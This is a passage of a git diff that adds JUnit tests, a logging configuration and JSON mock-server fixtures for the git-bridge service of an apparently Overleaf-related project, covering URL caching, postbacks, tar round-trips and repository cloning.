"http://localhost:" + mockServerRule.getPort() + "/123abc"; + final String oldTestPath = "testPath"; + final String newTestPath = "missingPath"; + + mockServerClient + .when(request().withMethod("GET").withPath("/123abc")) + .respond(response().withStatusCode(200).withBody("content")); + + final Mockery context = new Mockery(); + final DBStore dbStore = context.mock(DBStore.class); + context.checking( + new Expectations() { + { + // It should fetch the file once it finds it is missing. + oneOf(dbStore).getPathForURLInProject(testProjectName, testUrl); + will(returnValue(oldTestPath)); + + // It should update the URL index store once it has fetched; at present, it does not + // actually change the stored path. + oneOf(dbStore).addURLIndexForProject(testProjectName, testUrl, oldTestPath); + } + }); + + ResourceCache resources = new UrlResourceCache(dbStore); + TemporaryFolder repositoryFolder = new TemporaryFolder(); + repositoryFolder.create(); + String repoStorePath = repositoryFolder.getRoot().getAbsolutePath(); + RepoStore repoStore = new FSGitRepoStore(repoStorePath, Optional.empty()); + ProjectRepo repo = repoStore.initRepo("repo"); + Map<String, RawFile> fileTable = repo.getDirectory().getFileTable(); + Map<String, byte[]> fetchedUrls = new HashMap<>(); + resources.get(testProjectName, testUrl, newTestPath, fileTable, fetchedUrls, Optional.empty()); + + // We don't bother caching in this case, at present. + assertEquals(0, fetchedUrls.size()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManagerTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManagerTest.java new file mode 100644 index 0000000..fe2008c --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManagerTest.java @@ -0,0 +1,54 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import static org.junit.Assert.*; + +import org.junit.Assert; +import org.junit.Test; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InternalErrorException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException; + +/* + * Created by winston on 05/04/2016. + */ +public class PostbackManagerTest { + + private final PostbackManager postbackManager = new PostbackManager(); + + @Test + public void testRaceWithVersionId() throws UnexpectedPostbackException, SnapshotPostException { + String key = postbackManager.makeKeyForProject("proj"); + postbackManager.postVersionIDForProject("proj", 1, key); + int versionId = postbackManager.waitForVersionIdOrThrow("proj"); + assertEquals("Version id didn't match posted", 1, versionId); + } + + @Test + public void testRaceWithException() throws UnexpectedPostbackException, SnapshotPostException { + String key = postbackManager.makeKeyForProject("proj"); + InternalErrorException ex = new InternalErrorException(); + postbackManager.postExceptionForProject("proj", ex, key); + try { + postbackManager.waitForVersionIdOrThrow("proj"); + } catch (InternalErrorException e) { + Assert.assertSame("Wrong exception was thrown", ex, e); + return; + } + Assert.fail("Exception wasn't thrown as required"); + } + + @Test + public void testTableConsistency() throws UnexpectedPostbackException, SnapshotPostException { + String key1 = postbackManager.makeKeyForProject("proj1"); + assertEquals(1, postbackManager.postbackContentsTable.size()); + String key2 = postbackManager.makeKeyForProject("proj2"); + assertEquals(2, postbackManager.postbackContentsTable.size()); + postbackManager.postVersionIDForProject("proj1", 1, key1); + postbackManager.postVersionIDForProject("proj2", 1, key2); + assertEquals(2, postbackManager.postbackContentsTable.size()); + postbackManager.waitForVersionIdOrThrow("proj1"); + assertEquals(1, postbackManager.postbackContentsTable.size()); + postbackManager.waitForVersionIdOrThrow("proj2"); + Assert.assertTrue(postbackManager.postbackContentsTable.isEmpty()); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest.java new file mode 100644 index 0000000..532ccf7 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest.java @@ -0,0 +1,130 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.util; + +import java.net.URISyntaxException; +import java.nio.file.Path; +import java.nio.file.Paths; +import org.junit.Assert; +import org.junit.Test; + +public class FileUtilTest { + + @Test + public void returnsTrueWhenFilesAreEqualInBothDirectories() throws URISyntaxException { + Path eq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1") + .toURI()); + Path eq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2") + .toURI()); + Assert.assertTrue(FileUtil.gitDirectoriesAreEqual(eq1, eq2)); + } + + @Test + public void returnsTrueWhenRecursiveFilesAreEqualInBothDirectores() throws URISyntaxException { + Path eq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1") + .toURI()); + Path eq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2") + .toURI()); + Assert.assertTrue(FileUtil.gitDirectoriesAreEqual(eq1, eq2)); + } + + @Test + public void returnsFalseWhenFilesAreNotEqualInBothDirectories() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories() + throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsTrueEvenIfGitDirectoriesAreNotEqual() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2") + .toURI()); + Assert.assertTrue(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsFalseIfFileNamesAreNotEqual() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } + + @Test + public void returnsFalseIfInnerDirectoryNamesAreNotEqual() throws URISyntaxException { + Path neq1 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1") + .toURI()); + Path neq2 = + Paths.get( + getClass() + .getResource( + "/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2") + .toURI()); + Assert.assertFalse(FileUtil.gitDirectoriesAreEqual(neq1, neq2)); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/ProjectTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/ProjectTest.java new file mode 100644 index 0000000..ef17eda --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/ProjectTest.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.util; + +import org.junit.Assert; +import org.junit.Test; + +/* + * Created by winston on 23/08/2016. + */ +public class ProjectTest { + + @Test + public void testValidProjectNames() { + Assert.assertFalse(Project.isValidProjectName(null)); + Assert.assertFalse(Project.isValidProjectName("")); + Assert.assertFalse(Project.isValidProjectName(".wlgb")); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TarTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TarTest.java new file mode 100644 index 0000000..59c00d5 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TarTest.java @@ -0,0 +1,70 @@ +package uk.ac.ic.wlgitbridge.util; + +import static org.junit.Assert.assertTrue; + +import java.io.File; +import java.io.IOException; +import java.io.InputStream; +import org.junit.Before; +import org.junit.Test; +import org.junit.rules.TemporaryFolder; + +/* + * Created by winston on 23/08/2016. + */ +public class TarTest { + + private static final String RESOURCE_DIR = "/uk/ac/ic/wlgitbridge/util/TarTest"; + + private File testDir; + private File dirWithEmptyFile; + private File tmpDir; + + @Before + public void setup() throws IOException { + TemporaryFolder tmpFolder = new TemporaryFolder(); + tmpFolder.create(); + testDir = ResourceUtil.copyOfFolderResource(RESOURCE_DIR + "/testdir", tmpFolder::newFolder); + dirWithEmptyFile = + ResourceUtil.copyOfFolderResource( + RESOURCE_DIR + "/dir_with_empty_file", tmpFolder::newFolder); + tmpDir = tmpFolder.newFolder(); + } + + /* + * Compresses inputDir and decompresses to outputDir. Checks equality + * between outputDir and inputDir. + * @param inputDir the directory to compress + * @param outputDir the output directory. Must be empty. + * @param compressFunction compression function + * @param decompressFunction decompression function + * @throws IOException + */ + private static void assertCompDecompEqual( + File inputDir, + File outputDir, + FunctionT<File, InputStream, IOException> compressFunction, + BiConsumerT<InputStream, File, IOException> decompressFunction) + throws IOException { + try (InputStream tarbz2 = compressFunction.apply(inputDir)) { + decompressFunction.accept(tarbz2, outputDir); + File unzipped = new File(outputDir, inputDir.getName()); + assertTrue(Files.contentsAreEqual(inputDir, unzipped)); + } + } + + @Test + public void tarAndUntarProducesTheSameResult() throws IOException { + assertCompDecompEqual(testDir, tmpDir, Tar::tar, Tar::untar); + } + + @Test + public void tarbz2AndUntarbz2ProducesTheSameResult() throws IOException { + assertCompDecompEqual(testDir, tmpDir, Tar.bz2::zip, Tar.bz2::unzip); + } + + @Test + public void tarbz2WorksOnDirectoriesWithAnEmptyFile() throws IOException { + assertCompDecompEqual(dirWithEmptyFile, tmpDir, Tar.bz2::zip, Tar.bz2::unzip); + } +} diff --git a/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TimerUtilsTest.java b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TimerUtilsTest.java new file mode 100644 index 0000000..892b9c1 --- /dev/null +++ b/services/git-bridge/src/test/java/uk/ac/ic/wlgitbridge/util/TimerUtilsTest.java @@ -0,0 +1,18 @@ +package uk.ac.ic.wlgitbridge.util; + +import static org.junit.Assert.assertEquals; + +import org.junit.Test; + +/* + * Created by winston on 23/08/2016. + */ +public class TimerUtilsTest { + + @Test + public void testMakeTimerTask() { + int[] iPtr = new int[] {3}; + TimerUtils.makeTimerTask(() -> iPtr[0] = 5).run(); + assertEquals(5, iPtr[0]); + } +} diff --git a/services/git-bridge/src/test/resources/logback-test.xml b/services/git-bridge/src/test/resources/logback-test.xml new file mode 100644 index 0000000..455a379 --- /dev/null +++ b/services/git-bridge/src/test/resources/logback-test.xml @@ -0,0 +1,17 @@ +<configuration> + <!-- Log everything (subject to logger and root levels set below) to stdout. --> + <appender name="stderr" class="ch.qos.logback.core.ConsoleAppender"> + <target>System.err</target> + <encoder> + <pattern>%d{yyyy-MM-dd HH:mm:ss.SSS} %-5level [%thread] %logger{0}: %msg%n</pattern> + </encoder> + </appender> + + <!-- Set log levels for the application (or parts of the application). --> + <logger name="uk.ac.ic.wlgitbridge" level="INFO" /> + + <!-- The root log level determines how much our dependencies put in the logs. --> + <root level="WARN"> + <appender-ref ref="stderr" /> + </root> +</configuration> diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d670460 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +test content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/state.json new file mode 100644 index 0000000..4789afb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneAMigratedRepositoryWithoutChanges/state/state.json @@ -0,0 +1,29 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 0, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 0, + "srcs": [ + { + "content": "test content\n", + "path": "main.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 1 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/state.json new file mode 100644 index 0000000..1990cf0 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneARepository/state/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3857/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410-copy.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410-copy.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/state.json new file mode 100644 index 0000000..593a965 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneDuplicateBinaryFiles/state/state.json @@ -0,0 +1,50 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4002/state/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410-copy.png" + }, + { + "url": "http://127.0.0.1:4002/state/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/overleaf-white-410.png new file mode 100644 index 0000000..6a23d10 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/111111111111111111111111/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png new file mode 100644 index 0000000..7fa339b Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/foo/bar/test.tex new file mode 100644 index 0000000..1c05c01 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/foo/bar/test.tex @@ -0,0 +1 @@ +a different one \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/main.tex new file mode 100644 index 0000000..802d4bb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/222222222222222222222222/main.tex @@ -0,0 +1 @@ +different content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/state.json new file mode 100644 index 0000000..85b21f5 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canCloneMultipleRepositories/state/state.json @@ -0,0 +1,90 @@ +[ + { + "project": "111111111111111111111111", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3858/state/111111111111111111111111/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + }, + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "different content\n", + "path": "main.tex" + }, + { + "content": "a different one", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3858/state/222222222222222222222222/editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png", + "path": "editor-versions-a7e4de19d015c3e7477e3f7eaa6c418e.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/state.json new file mode 100644 index 0000000..9e6ad36 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canMigrateRepository/state/state.json @@ -0,0 +1,83 @@ +[ + { + "project": "222222222222222222222222", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "migratedFromId": "000000000000000000000000" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3881/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": 